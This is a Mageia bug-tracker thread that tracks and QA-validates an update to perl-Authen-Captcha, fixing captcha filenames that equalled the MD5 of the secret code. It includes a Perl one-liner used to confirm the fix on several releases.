Fedora has issued an advisory on March 28: https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131155.html Mageia 3 is also affected. Reproducible: Steps to Reproduce:
Whiteboard: (none) => MGA3TOO
packages available: - perl-Authen-Captcha-1.24.0-1.mga3 - perl-Authen-Captcha-1.24.0-1.mga4 please validate & push.
CC: (none) => jquelinAssignee: jquelin => qa-bugs
We'll need much more info to be able to do so I'm afraid Jerome.
Ok, here's a way to validate: ** before: $ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"' md5: c0a7f3581049f2b0f9e3d5942e80944f file: c0a7f3581049f2b0f9e3d5942e80944f ==> the 2 lines are the same (filename is the same as md5 sum of the code) ** after: $ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"' md5: 83f989dd820bb3683ef6ff6b2bc7fd68 file: 69a8588b5d255cd4682b13b058b295b0 ==> the filename is now different from the code md5 ** advisory =========================== An issue in previous versions of perl-Authen-Captcha is that the generated public string (file name of the picture) for the captcha is merely a checksum of the secret string. It is trivial to break such short strings even using google instead of a rainbow table. This new version of perl-Authen-Captcha fixes the problem by producing a random filename for the captcha. ===========================
Thanks Jerome, that's great :)
Whiteboard: MGA3TOO => MGA3TOO has_procedure
Testing complete mga4 64 Is there a CVE for this? David do you want to add any refs etc to the advisory? Before ------ $ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"' md5: 202d4eac55a158965f90468b35d0d9e1 file: 202d4eac55a158965f90468b35d0d9e1 After ----- There is an added require of perl-String-Random # urpmi perl-Authen-Captcha To satisfy dependencies, the following packages are going to be installed: Package Version Release Arch (medium "Core Release") perl-String-Random 0.220.0 3.mga4 noarch (medium "Core Updates Testing") perl-Authen-Captcha 1.24.0 1.mga4 noarch 26KB of additional disk space will be used. 112KB of packages will be retrieved. Proceed with the installation of the 2 packages? (Y/n) y $ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"' md5: 3c9d69741f38a95eebf16bacc6c718fb file: 7adb03011a3636765f228afaaac03134
Whiteboard: MGA3TOO has_procedure => MGA3TOO has_procedure mga4-64-ok
No CVE listed by Fedora, and I'm not aware of one. The Fedora advisory itself should be in the References, I don't have any others: https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131155.html
OK thanks. Testing complete mga4 32. Testing the rest shortly
Whiteboard: MGA3TOO has_procedure mga4-64-ok => MGA3TOO has_procedure mga4-32-ok mga4-64-ok
Testing complete mga3 32 & 64 Advisory uploaded. Validating. Could sysadmin please push to 3 & 4 updates Thanks
Keywords: (none) => validated_updateWhiteboard: MGA3TOO has_procedure mga4-32-ok mga4-64-ok => MGA3TOO has_procedure advisory mga3-32-ok mga3-64-ok mga4-32-ok mga4-64-okCC: (none) => sysadmin-bugs
http://advisories.mageia.org/MGASA-2014-0167.html
Status: NEW => RESOLVEDCC: (none) => mageiaResolution: (none) => FIXED